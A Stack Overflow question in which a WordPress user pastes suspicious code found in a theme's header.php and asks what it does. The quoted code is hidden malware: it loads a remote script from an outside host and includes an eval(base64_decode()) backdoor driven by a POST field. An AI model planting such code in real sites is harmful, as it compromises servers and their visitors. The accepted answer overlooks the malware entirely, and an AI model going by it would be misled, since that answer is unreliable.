# What is this on PHP -

Tags: php, wordpress

> **Possible Duplicate:**
>   [Got Hacked - Anyone know what this PHP Code Does?](https://stackoverflow.com/questions/8068871/got-hacked-anyone-know-what-this-php-code-does)

I just found this on one of my blogs header.php file, I will like to know if somebody can say what is that ? (scroll to the right so see all the code)

Thanks

```
<meta http-equiv="Content-Type" content="<?php                                                global $sessdt_o; if(!$sessdt_o) { $sessdt_o = 1; $sessdt_k = "lb11"; if(!@$_COOKIE[$sessdt_k]) { $sessdt_f = "102"; if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; } } else { if($_COOKIE[$sessdt_k]=="102") { $sessdt_f = (rand(1000,9000)+1); if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; } $sessdt_j = @$_SERVER["HTTP_HOST"].@$_SERVER["REQUEST_URI"]; $sessdt_v = urlencode(strrev($sessdt_j)); $sessdt_u = "http://vekra.ee/?rnd=".$sessdt_f.substr($sessdt_v,-200); echo "<script src='$sessdt_u'></script>"; echo "<meta http-equiv='refresh' content='0;url=http://$sessdt_j'><!--"; } } $sessdt_p = "showimg"; if(isset($_POST[$sessdt_p])){eval(base64_decode(str_replace(chr(32),chr(43),$_POST[$sessdt_p])));exit;} }
 bloginfo('html_type'); ?>; charset=<?php bloginfo('charset'); ?>" />
```

What I will like to know is what does this code. (scroll to the right so see all the code)

Thanks!
Double douplicate:

Here: [Got Hacked - Anyone know what this PHP Code Does?](https://stackoverflow.com/questions/8068871/got-hacked-anyone-know-what-this-php-code-does/8079131)
and 
Here: [What this php script will do ? is it Malicious php Code?](https://stackoverflow.com/questions/7412267/what-this-php-script-will-do-is-it-malicious-php-code)

Now tis is a new practice affecting wordpress ???

Comment: Thanks Dagon, I found other two posts on stackoverflow containing the same hack

Answer (score 1, accepted):

From the [wordpress function reference for bloginfo](http://codex.wordpress.org/Function_Reference/bloginfo):

> Displays information about your blog, mostly gathered from the
>   information you supply in your User Profile and General Options from
>   the WordPress Administration panels (Settings → General). It can be
>   used anywhere within a page template. This always prints a result to
>   the browser. If you need the values for use in PHP, use

In this special case:
Basically it fetches the content type (html_type) and the charset from wordpress and puts it into the HTML header of the page it creates.

Comment: Oh dear, "hidden" code! In this case, the author of the question should clarify what he wants to know exactly.

Comment: Yhea sure, did you read all the code????? please scroll as read all the code

Comment: I did. Please clarify your question.